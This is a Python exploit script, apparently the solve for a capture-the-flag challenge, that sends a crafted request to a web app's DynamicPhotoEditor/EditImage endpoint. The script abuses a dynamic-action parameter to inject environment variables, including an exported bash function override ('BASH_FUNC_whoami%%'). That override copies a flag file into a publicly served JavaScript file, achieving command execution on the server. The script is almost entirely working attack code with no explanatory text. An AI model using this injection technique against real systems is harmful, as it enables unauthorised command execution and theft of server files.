solve (1613B)
1#!/usr/bin/env python3 2 3from base64 import b64decode 4 5import requests 6import sys 7 8cookies = { 9 '_streamlit_xsrf': '2|9690aa7c|65f1b6483b23d4f268aaa1bc37107645|1713379145', 10 'ajs_anonymous_id': '41f17fef-5f83-4be5-a144-1bcfd22fd984', 11} 12 13headers = { 14 'Accept': 'application/json, text/javascript, */*; q=0.01', 15 'Accept-Language': 'en-US,en;q=0.9', 16 'Cache-Control': 'no-cache', 17 'Connection': 'keep-alive', 18 'Content-Type': 'application/json', 19 'Origin': 'http://localhost:1024', 20 'Pragma': 'no-cache', 21 'Referer': 'http://localhost:1024/', 22 'Sec-Fetch-Dest': 'empty', 23 'Sec-Fetch-Mode': 'cors', 24 'Sec-Fetch-Site': 'same-origin', 25 'Sec-GPC': '1', 26 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36', 27 'X-Requested-With': 'XMLHttpRequest', 28 'sec-ch-ua': '"Brave";v="123", "Not:A-Brand";v="8", "Chromium";v="123"', 29 'sec-ch-ua-mobile': '?0', 30 'sec-ch-ua-platform': '"Linux"', 31} 32 33json_data = { 34 'Base64Blob': open("b64").read().strip(), 35 'DynamicAction': 'GetUsername', 36 'Parameters': '[{"PATH": "/usr/bin", "BASH_FUNC_whoami%%": "() { cat /App/flag > /App/wwwroot/js/flag.js; }"}]', 37 'Types': ["System.Collections.Generic.Dictionary`2[System.String,System.String]"], 38} 39 40baseurl = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:1024" 41response = requests.post( 42 f'{baseurl}/api/DynamicPhotoEditor/EditImage', 43 cookies=cookies, 44 headers=headers, 45 json=json_data, 46) 47print(response.status_code) 48print(response.text) 49print(b64decode(response.json()["base64Blob"]))